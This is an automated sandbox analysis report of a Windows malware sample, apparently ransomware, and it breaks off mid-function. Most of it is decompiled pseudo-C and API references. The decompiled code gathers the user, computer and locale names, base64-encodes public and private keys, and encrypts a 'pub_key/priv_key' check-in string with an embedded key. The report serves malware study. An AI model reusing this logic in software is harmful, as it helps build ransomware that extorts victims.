                                      control_flow_graph 230 405750-4057dc call 4039b0 call 406d90 call 406ba0 VirtualAlloc 237 4057f1-4057f5 230->237 238 4057de-4057e0 230->238 239 4057f7-405806 237->239 238->237 240 4057e2-4057ef 238->240 241 405808-40580d 239->241 242 40581f-405821 239->242 240->239 241->242 243 40580f-40581d 241->243 244 405825-40582e 242->244 243->244 245 405830-40583b 244->245 246 40583d-40583f 244->246 245->246 247 405843-405845 245->247 246->247 248 405c14 247->248 249 40584b-4058c8 CryptBinaryToStringA * 2 lstrlenA * 2 VirtualAlloc lstrlenA 247->249 252 405c1a 248->252 250 4058ca-4058cc 249->250 251 4058df 249->251 250->251 253 4058ce-4058dd 250->253 254 4058e7-4058f0 lstrlenA 251->254 255 405c1f-405c3d VirtualFree call 407720 252->255 253->254 256 4058f2-4058f8 254->256 257 4058fa 254->257 256->257 259 405902-40590c lstrlenA 256->259 257->259 261 405942-405949 lstrlenA 259->261 262 40590e-40591a 259->262 264 405971-405a38 lstrcatW lstrlenW call 4069a0 lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW VirtualAlloc lstrlenW 261->264 265 40594b-40594f 261->265 263 405920-405925 262->263 266 405932-40593c lstrlenA 263->266 267 405927-405929 263->267 276 405a44-405a46 264->276 277 405a3a-405a3c 264->277 268 405953-405958 265->268 266->263 271 40593e 266->271 267->266 270 40592b-40592e 267->270 272 405965-40596f lstrlenA 268->272 273 40595a-40595c 268->273 270->266 271->261 272->264 272->268 273->272 275 40595e-405961 273->275 275->272 279 405a4a-405afe lstrlenW call 408b30 lstrlenA call 405c40 call 405cf0 CryptBinaryToStringA 276->279 277->276 278 405a3e-405a42 277->278 278->279 286 405b00 GetLastError 279->286 287 405b06-405b2c lstrlenA VirtualAlloc lstrlenA 279->287 286->287 288 405b36 287->288 289 405b2e-405b34 287->289 290 405b3e-405b45 lstrlenA 288->290 289->288 289->290 291 405b47-405b4f 290->291 292 405b6e-405ba4 lstrlenA MultiByteToWideChar call 405370 290->292 294 405b50-405b55 291->294 299 405ba6-405bd5 VirtualFree * 3 292->299 300 405bd7-405bdd 292->300 295 405b62-405b6c lstrlenA 294->295 296 405b57-405b59 294->296 295->292 295->294 296->295 298 405b5b-405b5e 296->298 298->295 299->255 301 405be4-405c12 VirtualFree * 3 300->301 302 405bdf-405be2 300->302 301->252 302->301
                                      C-Code - Quality: 78%
                                      			E00405750(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
                                      				char _v295;
                                      				char _v296;
                                      				char _v404;
                                      				char _v408;
                                      				void* _v428;
                                      				CHAR* _v432;
                                      				int _v436;
                                      				int _v440;
                                      				char _v442;
                                      				CHAR* _v444;
                                      				short _v448;
                                      				int _v452;
                                      				char _v456;
                                      				CHAR* _v464;
                                      				int _v468;
                                      				void* _v472;
                                      				BYTE* _v476;
                                      				WCHAR* _v480;
                                      				WCHAR* _v484;
                                      				void* _v488;
                                      				void* _v492;
                                      				short* _v496;
                                      				CHAR* _v500;
                                      				void* _v504;
                                      				long _v508;
                                      				CHAR* _v512;
                                      				CHAR* _v528;
                                      				CHAR* _t133;
                                      				void* _t135;
                                      				int _t145;
                                      				void* _t148;
                                      				int _t149;
                                      				void* _t150;
                                      				void* _t152;
                                      				signed int _t159;
                                      				signed int _t163;
                                      				void* _t170;
                                      				signed int _t172;
                                      				CHAR* _t185;
                                      				long _t189;
                                      				intOrPtr _t199;
                                      				int _t200;
                                      				void _t202;
                                      				int _t203;
                                      				void _t204;
                                      				int _t205;
                                      				int _t210;
                                      				long _t213;
                                      				void* _t219;
                                      				short _t228;
                                      				char* _t229;
                                      				WCHAR* _t231;
                                      				short _t233;
                                      				CHAR* _t234;
                                      				char _t235;
                                      				void* _t238;
                                      				long _t240;
                                      				long _t241;
                                      				void* _t243;
                                      				void* _t245;
                                      				short _t248;
                                      				int _t249;
                                      				void* _t255;
                                      				CHAR* _t256;
                                      				WCHAR* _t258;
                                      				WCHAR* _t259;
                                      				signed int _t261;
                                      				CHAR* _t262;
                                      				CHAR* _t263;
                                      				int _t267;
                                      				void* _t268;
                                      				long _t271;
                                      				void* _t272;
                                      				void* _t273;
                                      				long _t279;
                                      				int _t280;
                                      				long _t281;
                                      				void* _t282;
                                      				CHAR* _t283;
                                      				short _t284;
                                      
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_v456 = __ecx;
                                      				_t210 = __edx;
                                      				_v436 = __edx;
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				E004039B0( &_v404);
                                      				E00406D90( &_v492);
                                      				_t255 = E00406BA0( &_v492);
                                      				_t7 = _a8 + _t210 + 8; // 0x8
                                      				_t213 = _t255 + _t7 * 8 << 3;
                                      				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40);
                                      				_t248 = 0;
                                      				_v512 = _t133;
                                      				_v528 = _t133;
                                      				_t228 = 0x30 + (_t255 + (_a8 + _t210) * 4) * 8;
                                      				if(_t133 == 0 || _t228 >= _t213) {
                                      					_v448 = _t248;
                                      					_t256 = _t133;
                                      				} else {
                                      					_t256 =  &(_t133[_t228]);
                                      					_v448 = _t133;
                                      					_v444 = _t256;
                                      					_t248 = _t228;
                                      				}
                                      				_t135 = 2 + _a8 * 8;
                                      				if(_v428 == 0) {
                                      					L7:
                                      					_t229 = 0;
                                      					_v432 = 0;
                                      				} else {
                                      					_t284 = _t248 + _t135;
                                      					if(_t284 >= _t213) {
                                      						goto L7;
                                      					} else {
                                      						_t229 = _t256;
                                      						_v432 = _t256;
                                      						_t256 =  &(_t256[_t135]);
                                      						_t248 = _t284;
                                      						_v444 = _t256;
                                      					}
                                      				}
                                      				_t267 = _v440;
                                      				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
                                      					_t256 = 0;
                                      					_v444 = 0;
                                      				}
                                      				if(_t229 == 0) {
                                      					goto L53;
                                      				} else {
                                      					_t249 = _a8;
                                      					_v436 = _t249 + _t249;
                                      					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
                                      					_v452 = _t267 + _t267;
                                      					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
                                      					_t145 = lstrlenA(_t256);
                                      					_t271 = _t145 + lstrlenA(_v464) + 0x42;
                                      					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40);
                                      					_v472 = _t148;
                                      					_v488 = _t148;
                                      					_v492 = 0;
                                      					_t149 = lstrlenA(_v464);
                                      					_t231 = _v472;
                                      					_t150 = _t149 + 1;
                                      					if(_t231 == 0 || _t150 >= _t271) {
                                      						_v484 = 0;
                                      					} else {
                                      						_v492 = _t150;
                                      						_v488 = _t231 + _t150;
                                      						_v484 = _t231;
                                      					}
                                      					_t152 = lstrlenA(_t256) + 1;
                                      					if(_v472 == 0 || _t152 + _v492 >= _t271) {
                                      						_v488 = 0;
                                      					}
                                      					_t272 = 0;
                                      					if(lstrlenA(_v464) != 0) {
                                      						_t245 = _v484;
                                      						_t263 = _v464;
                                      						_v492 = _t245;
                                      						do {
                                      							_t204 =  *((intOrPtr*)(_t272 + _t263));
                                      							if(_t204 != 0xa && _t204 != 0xd) {
                                      								 *_t245 = _t204;
                                      								_v492 = _t245 + 1;
                                      							}
                                      							_t272 = _t272 + 1;
                                      							_t205 = lstrlenA(_t263);
                                      							_t245 = _v492;
                                      						} while (_t272 < _t205);
                                      						_t256 = _v476;
                                      					}
                                      					_t273 = 0;
                                      					if(lstrlenA(_t256) != 0) {
                                      						_t243 = _v488;
                                      						_v492 = _t243;
                                      						do {
                                      							_t202 =  *((intOrPtr*)(_t273 + _t256));
                                      							if(_t202 != 0xa && _t202 != 0xd) {
                                      								 *_t243 = _t202;
                                      								_v492 = _t243 + 1;
                                      							}
                                      							_t273 = _t273 + 1;
                                      							_t203 = lstrlenA(_t256);
                                      							_t243 = _v492;
                                      						} while (_t273 < _t203);
                                      					}
                                      					_t258 = _v480;
                                      					lstrcatW(_t258, L"action=call&");
                                      					_t259 =  &(_t258[lstrlenW(_t258)]);
                                      					E004069A0( &_v440, _t259);
                                      					lstrcatW(_t259, L"&pub_key=");
                                      					_t159 = lstrlenW(_t259);
                                      					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
                                      					lstrcatW(_t259, L"&priv_key=");
                                      					_t163 = lstrlenW(_t259);
                                      					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
                                      					lstrcatW(_t259, L"&version=2.1");
                                      					_t279 = (lstrlenW(_v484) << 4) + 0x12;
                                      					_t219 = VirtualAlloc(0, _t279, 0x3000, 0x40);
                                      					_v480 = _t219;
                                      					_t170 = 2 + lstrlenW(_v484) * 8;
                                      					if(_t219 == 0 || _t170 >= _t279) {
                                      						_v492 = 0;
                                      					} else {
                                      						_v492 = _t219;
                                      					}
                                      					_t172 = lstrlenW(_v480);
                                      					_t233 = "#shasj"; // 0x61687323
                                      					_t261 = _t172;
                                      					asm("movq xmm0, [0x410128]");
                                      					_v448 = _t233;
                                      					_t234 =  *0x410134; // 0x6a73
                                      					_v444 = _t234;
                                      					_t235 =  *0x410136; // 0x0
                                      					asm("movq [esp+0x3c], xmm0");
                                      					_v442 = _t235;
                                      					_v296 = 0;
                                      					E00408B30( &_v295, 0, 0xff);
                                      					E00405C40( &_v296,  &_v456, lstrlenA( &_v456));
                                      					_t280 = _t261 + _t261;
                                      					E00405CF0( &_v296, _v480, _t280);
                                      					_t262 = _v492;
                                      					_v468 = _t261 * 8;
                                      					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
                                      						GetLastError();
                                      					}
                                      					_t105 = lstrlenA(_t262) + 2; // 0x2
                                      					_t281 = _t105;
                                      					_v504 = VirtualAlloc(0, _t281, 0x3000, 0x40);
                                      					_t107 = lstrlenA(_t262) + 1; // 0x1
                                      					_t238 = _t107;
                                      					_t185 = _v504;
                                      					if(_t185 == 0) {
                                      						L40:
                                      						_v500 = 0;
                                      					} else {
                                      						_v500 = _t185;
                                      						if(_t238 >= _t281) {
                                      							goto L40;
                                      						}
                                      					}
                                      					_t282 = 0;
                                      					if(lstrlenA(_t262) != 0) {
                                      						_t241 = _v500;
                                      						_v508 = _t241;
                                      						do {
                                      							_t199 =  *((intOrPtr*)(_t282 + _t262));
                                      							if(_t199 != 0xa && _t199 != 0xd) {
                                      								 *_t241 = _t199;
                                      								_v508 = _t241 + 1;
                                      							}
                                      							_t282 = _t282 + 1;
                                      							_t200 = lstrlenA(_t262);
                                      							_t241 = _v508;
                                      						} while (_t282 < _t200);
                                      					}
                                      					_t283 = _v500;
                                      					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
                                      					_v508 = 0;
                                      					_t189 = E00405370(_t283,  &_v508, 1);
                                      					if(_t189 != 0) {
                                      						_t240 = _v508;
                                      						if(_t240 != 0) {
                                      							 *_a12 = _t240;
                                      						}
                                      						VirtualFree(_v504, 0, 0x8000);
                                      						VirtualFree(_v492, 0, 0x8000);
                                      						VirtualFree(_v488, 0, 0x8000);
                                      						L53:
                                      						_t268 = 1;
                                      					} else {
                                      						VirtualFree(_v504, _t189, 0x8000);
                                      						VirtualFree(_v492, 0, 0x8000);
                                      						VirtualFree(_v488, 0, 0x8000);
                                      						_t268 = 0;
                                      					}
                                      				}
                                      				VirtualFree(_v428, 0, 0x8000);
                                      				E00407720( &_v408);
                                      				return _t268;
                                      			}



















































































                                      0x0040575f
                                      0x00405760
                                      0x00405762
                                      0x00405763
                                      0x00405768
                                      0x0040576c
                                      0x0040576e
                                      0x00405772
                                      0x00405774
                                      0x00405775
                                      0x00405777
                                      0x00405778
                                      0x0040577a
                                      0x0040577b
                                      0x0040577d
                                      0x0040577e
                                      0x00405783
                                      0x00405785
                                      0x00405786
                                      0x0040578f
                                      0x00405798
                                      0x004057a9
                                      0x004057b4
                                      0x004057ba
                                      0x004057c0
                                      0x004057c6
                                      0x004057c8
                                      0x004057cc
                                      0x004057d3
                                      0x004057dc
                                      0x004057f1
                                      0x004057f5
                                      0x004057e2
                                      0x004057e2
                                      0x004057e5
                                      0x004057e9
                                      0x004057ed
                                      0x004057ed
                                      0x004057ff
                                      0x00405806
                                      0x0040581f
                                      0x0040581f
                                      0x00405821
                                      0x00405808
                                      0x00405808
                                      0x0040580d
                                      0x00000000
                                      0x0040580f
                                      0x0040580f
                                      0x00405811
                                      0x00405815
                                      0x00405817
                                      0x00405819
                                      0x00405819
                                      0x0040580d
                                      0x0040582a
                                      0x0040582e
                                      0x0040583d
                                      0x0040583f
                                      0x0040583f
                                      0x00405845
                                      0x00000000
                                      0x0040584b
                                      0x0040584b
                                      0x00405857
                                      0x0040586a
                                      0x0040586f
                                      0x00405883
                                      0x0040588c
                                      0x004058a0
                                      0x004058a5
                                      0x004058af
                                      0x004058b3
                                      0x004058b7
                                      0x004058bf
                                      0x004058c1
                                      0x004058c5
                                      0x004058c8
                                      0x004058df
                                      0x004058ce
                                      0x004058d1
                                      0x004058d5
                                      0x004058d9
                                      0x004058d9
                                      0x004058ea
                                      0x004058f0
                                      0x004058fa
                                      0x004058fa
                                      0x00405906
                                      0x0040590c
                                      0x0040590e
                                      0x00405912
                                      0x00405916
                                      0x00405920
                                      0x00405920
                                      0x00405925
                                      0x0040592b
                                      0x0040592e
                                      0x0040592e
                                      0x00405933
                                      0x00405934
                                      0x00405936
                                      0x0040593a
                                      0x0040593e
                                      0x0040593e
                                      0x00405943
                                      0x00405949
                                      0x0040594b
                                      0x0040594f
                                      0x00405953
                                      0x00405953
                                      0x00405958
                                      0x0040595e
                                      0x00405961
                                      0x00405961
                                      0x00405966
                                      0x00405967
                                      0x00405969
                                      0x0040596d
                                      0x00405953
                                      0x00405971
                                      0x00405981
                                      0x00405990
                                      0x00405994
                                      0x0040599f
                                      0x004059a2
                                      0x004059c0
                                      0x004059cc
                                      0x004059cf
                                      0x004059f1
                                      0x004059fd
                                      0x00405a17
                                      0x00405a27
                                      0x00405a29
                                      0x00405a2f
                                      0x00405a38
                                      0x00405a46
                                      0x00405a3e
                                      0x00405a3e
                                      0x00405a3e
                                      0x00405a4e
                                      0x00405a50
                                      0x00405a56
                                      0x00405a58
                                      0x00405a67
                                      0x00405a6b
                                      0x00405a77
                                      0x00405a7c
                                      0x00405a85
                                      0x00405a8b
                                      0x00405a8f
                                      0x00405a97
                                      0x00405ab8
                                      0x00405ac1
                                      0x00405acf
                                      0x00405ade
                                      0x00405ae2
                                      0x00405afe
                                      0x00405b00
                                      0x00405b00
                                      0x00405b10
                                      0x00405b10
                                      0x00405b1d
                                      0x00405b23
                                      0x00405b23
                                      0x00405b26
                                      0x00405b2c
                                      0x00405b36
                                      0x00405b36
                                      0x00405b2e
                                      0x00405b2e
                                      0x00405b34
                                      0x00000000
                                      0x00000000
                                      0x00405b34
                                      0x00405b3f
                                      0x00405b45
                                      0x00405b47
                                      0x00405b4b
                                      0x00405b50
                                      0x00405b50
                                      0x00405b55
                                      0x00405b5b
                                      0x00405b5e
                                      0x00405b5e
                                      0x00405b63
                                      0x00405b64
                                      0x00405b66
                                      0x00405b6a
                                      0x00405b50
                                      0x00405b6e
                                      0x00405b84
                                      0x00405b90
                                      0x00405b9a
                                      0x00405ba4
                                      0x00405bd7
                                      0x00405bdd
                                      0x00405be2
                                      0x00405be2
                                      0x00405bf6
                                      0x00405c03
                                      0x00405c10
                                      0x00405c1a
                                      0x00405c1a
                                      0x00405ba6
                                      0x00405bb7
                                      0x00405bc4
                                      0x00405bd1
                                      0x00405bd3
                                      0x00405bd3
                                      0x00405ba4
                                      0x00405c2a
                                      0x00405c30
                                      0x00405c3d

                                      APIs
                                        • Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
                                        • Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
                                        • Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
                                        • Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
                                        • Part of subcall function 00406D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
                                        • Part of subcall function 00406D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
                                        • Part of subcall function 00406D90: RegCloseKey.ADVAPI32(00000000), ref: 00406ED2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
                                      • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 004057C0
                                      • CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0040586A
                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00405883
                                      • lstrlenA.KERNEL32(00000000), ref: 0040588C
                                      • lstrlenA.KERNEL32(?), ref: 00405894
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 004058A5
                                      • lstrlenA.KERNEL32(?), ref: 004058BF
                                      • lstrlenA.KERNEL32(00000000), ref: 004058E8
                                      • lstrlenA.KERNEL32(?), ref: 00405908
                                      • lstrlenA.KERNEL32(?), ref: 00405934
                                      • lstrlenA.KERNEL32(00000000), ref: 00405945
                                      • lstrlenA.KERNEL32(00000000), ref: 00405967
                                      • lstrcatW.KERNEL32(?,action=call&), ref: 00405981
                                      • lstrlenW.KERNEL32(?), ref: 0040598A
                                      • lstrcatW.KERNEL32(?,&pub_key=), ref: 0040599F
                                      • lstrlenW.KERNEL32(?), ref: 004059A2
                                      • lstrlenA.KERNEL32(00000000), ref: 004059AB
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,74CB69A0,00000000), ref: 004059C0
                                      • lstrcatW.KERNEL32(?,&priv_key=), ref: 004059CC
                                      • lstrlenW.KERNEL32(?), ref: 004059CF
                                      • lstrlenA.KERNEL32(00000000), ref: 004059DC
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,74CB69A0,00000000), ref: 004059F1
                                      • lstrcatW.KERNEL32(?,&version=2.1), ref: 004059FD
                                      • lstrlenW.KERNEL32(?), ref: 00405A09
                                      • VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 00405A1D
                                      • lstrlenW.KERNEL32(?), ref: 00405A2D
                                      • lstrlenW.KERNEL32(?), ref: 00405A4E
                                      • _memset.LIBCMT ref: 00405A97
                                      • lstrlenA.KERNEL32(?), ref: 00405AAA
                                        • Part of subcall function 00405C40: _memset.LIBCMT ref: 00405C6D
                                      • CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 00405AF6
                                      • GetLastError.KERNEL32 ref: 00405B00
                                      • lstrlenA.KERNEL32(?), ref: 00405B07
                                      • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00405B16
                                      • lstrlenA.KERNEL32(?), ref: 00405B21
                                      • lstrlenA.KERNEL32(?), ref: 00405B41
                                      • lstrlenA.KERNEL32(?), ref: 00405B64
                                      • lstrlenA.KERNEL32(00000000), ref: 00405B73
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 00405B84
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BB7
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BC4
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BD1
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BF6
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C03
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C10
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C2A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
                                      • String ID: #shasj$&priv_key=$&pub_key=$&version=2.1$action=call&
                                      • API String ID: 2781787645-879081296
                                      • Opcode ID: 42260e6ab3002364badc6e3d4333114a13f126ae31cbc07f3222118c6a6bf9c8
                                      • Instruction ID: 3a474d479e6cb3117948b119d777232bcba310bd2a7d749a27062e74eb6ba077
                                      • Opcode Fuzzy Hash: 42260e6ab3002364badc6e3d4333114a13f126ae31cbc07f3222118c6a6bf9c8
                                      • Instruction Fuzzy Hash: CEE18C71608301AFE710DF25CC85B6BBBE5EB88754F00492EF585A72A0D774AD05CFAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00405050(CHAR* __ecx, CHAR** __edx) {
                                      				int _v8;
                                      				CHAR* _v12;
                                      				int _v16;
                                      				char _v18;
                                      				void* _v20;
                                      				void* _v24;
                                      				void* _v28;
                                      				char _v32;
                                      				void* _v36;
                                      				CHAR** _v40;
                                      				void* _v44;
                                      				char _v299;
                                      				char _v300;
                                      				void* _v356;
                                      				void* _v360;
                                      				int _t55;
                                      				int _t56;
                                      				BYTE* _t57;
                                      				int _t59;
                                      				void* _t63;
                                      				void* _t64;
                                      				char _t65;
                                      				void* _t77;
                                      				signed int _t79;
                                      				signed int _t81;
                                      				int _t82;
                                      				int _t85;
                                      				char _t87;
                                      				CHAR* _t95;
                                      				int _t97;
                                      				char* _t98;
                                      				void* _t107;
                                      				void* _t108;
                                      				signed char _t109;
                                      				short* _t111;
                                      				WCHAR* _t116;
                                      				CHAR* _t117;
                                      				BYTE* _t124;
                                      				WCHAR* _t125;
                                      				WCHAR* _t126;
                                      				void* _t127;
                                      				long _t128;
                                      				char* _t129;
                                      				int _t130;
                                      				void* _t131;
                                      				CHAR* _t132;
                                      				void* _t133;
                                      				long _t134;
                                      				char* _t135;
                                      
                                      				_v40 = __edx;
                                      				_v12 = __ecx;
                                      				_t55 = lstrlenA(__ecx);
                                      				_t107 = VirtualAlloc;
                                      				_t56 = _t55 + 1;
                                      				_v16 = _t56;
                                      				_t4 = _t56 + 1; // 0x2
                                      				_t128 = _t4;
                                      				_t57 = VirtualAlloc(0, _t128, 0x3000, 0x40);
                                      				_v44 = _t57;
                                      				if(_t57 == 0 || _v16 >= _t128) {
                                      					_t124 = 0;
                                      					__eflags = 0;
                                      				} else {
                                      					_t124 = _t57;
                                      				}
                                      				_t129 = 0;
                                      				_t59 = CryptStringToBinaryA(_v12, 0, 1, _t124,  &_v16, 0, 0);
                                      				_t144 = _t59;
                                      				if(_t59 == 0) {
                                      					GetLastError();
                                      					goto L26;
                                      				} else {
                                      					_t63 = "#shasj"; // 0x61687323
                                      					asm("movq xmm0, [0x410128]");
                                      					_t130 = _v16;
                                      					_v24 = _t63;
                                      					_t64 =  *0x410134; // 0x6a73
                                      					_v20 = _t64;
                                      					_t65 =  *0x410136; // 0x0
                                      					_v18 = _t65;
                                      					asm("movq [ebp-0x1c], xmm0");
                                      					_v300 = 0;
                                      					E00408B30( &_v299, 0, 0xff);
                                      					E00405C40( &_v300,  &_v32, lstrlenA( &_v32));
                                      					E00405CF0( &_v300, _t124, _t130);
                                      					_t116 =  &_v32;
                                      					asm("xorps xmm0, xmm0");
                                      					asm("movdqu [ebp-0x1c], xmm0");
                                      					E004033E0(_t116, _t144, _t124);
                                      					if(_v32 != 0) {
                                      						E00404FD0();
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						_push(_t107);
                                      						_push(_t130);
                                      						_push(_t124);
                                      						_t125 = _t116;
                                      						_t131 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
                                      						_v360 = _t131;
                                      						GetModuleFileNameW(0, _t131, 0x200);
                                      						_t108 = CreateFileW(_t131, 0x80000000, 1, 0, 3, 0x80, 0);
                                      						_v356 = _t108;
                                      						__eflags = _t108 - 0xffffffff;
                                      						if(_t108 != 0xffffffff) {
                                      							_t77 = CreateFileMappingW(_t108, 0, 8, 0, 0, 0);
                                      							_v28 = _t77;
                                      							__eflags = _t77;
                                      							if(_t77 != 0) {
                                      								_t79 = MapViewOfFile(_t77, 1, 0, 0, 0);
                                      								_v16 = _t79;
                                      								__eflags = _t79;
                                      								if(_t79 != 0) {
                                      									_t41 = _t79 + 0x4e; // 0x4e
                                      									_t132 = _t41;
                                      									_v12 = _t132;
                                      									_t81 = lstrlenW(_t125);
                                      									_t109 = 0;
                                      									_t126 =  &(_t125[_t81]);
                                      									_t82 = lstrlenA(_t132);
                                      									__eflags = _t82 + _t82;
                                      									if(_t82 + _t82 != 0) {
                                      										_t117 = _t132;
                                      										do {
                                      											__eflags = _t109 & 0x00000001;
                                      											if((_t109 & 0x00000001) != 0) {
                                      												 *((char*)(_t126 + _t109)) = 0;
                                      											} else {
                                      												_t87 =  *_t132;
                                      												_t132 =  &(_t132[1]);
                                      												 *((char*)(_t126 + _t109)) = _t87;
                                      											}
                                      											_t109 = _t109 + 1;
                                      											_t85 = lstrlenA(_t117);
                                      											_t117 = _v12;
                                      											__eflags = _t109 - _t85 + _t85;
                                      										} while (_t109 < _t85 + _t85);
                                      									}
                                      									UnmapViewOfFile(_v16);
                                      									_t108 = _v20;
                                      									_t131 = _v24;
                                      								}
                                      								CloseHandle(_v28);
                                      							}
                                      							CloseHandle(_t108);
                                      						}
                                      						return VirtualFree(_t131, 0, 0x8000);
                                      					} else {
                                      						_t127 = _v28;
                                      						_v12 = 1;
                                      						if(_t127 != 0) {
                                      							_t97 = lstrlenA(_t127);
                                      							_v8 = _t97;
                                      							_t24 = _t97 + 1; // 0x1
                                      							_t134 = _t24;
                                      							_t98 = VirtualAlloc(0, _t134, 0x3000, 0x40);
                                      							_v36 = _t98;
                                      							if(_t98 == 0 || _v8 >= _t134) {
                                      								_t135 = 0;
                                      								__eflags = 0;
                                      							} else {
                                      								_t135 = _t98;
                                      							}
                                      							if(CryptStringToBinaryA(_t127, 0, 1, _t135,  &_v8, 0, 0) != 0) {
                                      								_t111 = VirtualAlloc(0, 2 + _v8 * 2, 0x3000, 4);
